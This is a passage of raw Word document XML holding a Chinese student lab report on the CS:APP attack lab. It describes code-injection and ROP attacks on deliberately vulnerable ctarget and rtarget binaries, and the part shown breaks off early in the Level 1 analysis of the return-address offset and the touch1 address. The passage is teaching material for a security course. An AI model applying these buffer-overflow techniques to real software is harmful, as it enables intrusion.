        <w:t>GDB调试工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>积分榜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://10.120.11.13:193</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0/scoreboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>三、实验内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>登录bupt1服务器，在home目录下可以找到一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.tar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件，解压后得到如下文件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>README.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rtarget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cookie.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>farm.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hex2raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ctarget和rtarget运行时从标准输入读入字符串，这两个程序都存在缓冲区溢出漏洞。通过代码注入的方法实现对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ctarget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>程序的攻击，共有3关，输入一个特定字符串，可成功调用touch1，或touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，或touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>就通关，并向计分服务器提交得分信息；通过ROP方法实现对r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>target程序的攻击，共有2关，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在指定区域找到所需要的小工具，进行拼接完成指定功能，再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输入一个特定字符串，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>成功调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3就通关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，并向计分服务器提交得分信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>否则失败，但不扣分。因此，本实验需要通过反汇编和逆向工程对ctraget和rtarget执行文件进行分析，找到保存返回地址在堆栈中的位置以及所需要的小工具机器码。实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的具体内容见实验说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>尤其需要认真阅读各阶段的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Some Advice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>本实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>包含了5个阶段（或关卡）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，难度逐级递增。各阶段分数如下所示：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3657600" cy="16014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b="20137"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3657600" cy="1602029"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>四、实验步骤及实验分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482"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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>准备工作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</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阅读所给文档，学习所需要的关于栈的知识，然后解压缩给出的压缩包，对ctarget文件和rtarget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件进行反汇编，生成反汇编文件，了解gadget farm和HEX2RAW的作用和用法。</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HEX2RAW期望一个或多个空格分隔的两位数十六进制值，并通过这些十六进制数生成相应攻击字符。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第一部分：</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在前三个阶段，我们的漏洞字符串将攻击CTARGET。这个程序的设置方式使堆栈位置从一次运行到下一次运行都是一致的，因此堆栈上的数据可以被视为可执行代码。这些特性使程序容易受到攻击，其中利用字符串包含可执行代码的字节编码。所以第一部分的三道题都可通过注入代码实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Level1:</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Phase1要求我们让CTARGET在getbuf执行其返回语句时执行touch1的代码，而不是返回到test。</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现在我们首先来查看一下getbuf和touch1的反汇编代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6188710" cy="2820035"/>
            <wp:effectExtent l="0" t="0" r="8890"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6188710" cy="2820035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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可以看到touch1的地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x4018b1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，而getbuf开辟的空间为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，也就是40，所以我们需要让函数结束时不返回到test而是跳转到touch1，那么我们需要通过缓冲区溢出来进行操作，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="4682" w:tblpY="27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356" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:rStyle w:val="14"/>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"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356" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:rStyle w:val="14"/>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"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356" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:rStyle w:val="14"/>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"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356" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:rStyle w:val="14"/>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"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1356" w:type="dxa"/>
          </w:tcPr>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%rsp//返回地址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356" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:rStyle w:val="14"/>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"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356" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:rStyle w:val="14"/>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"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356" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:rStyle w:val="14"/>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"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356" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:rStyle w:val="14"/>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>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356" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:rStyle w:val="14"/>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
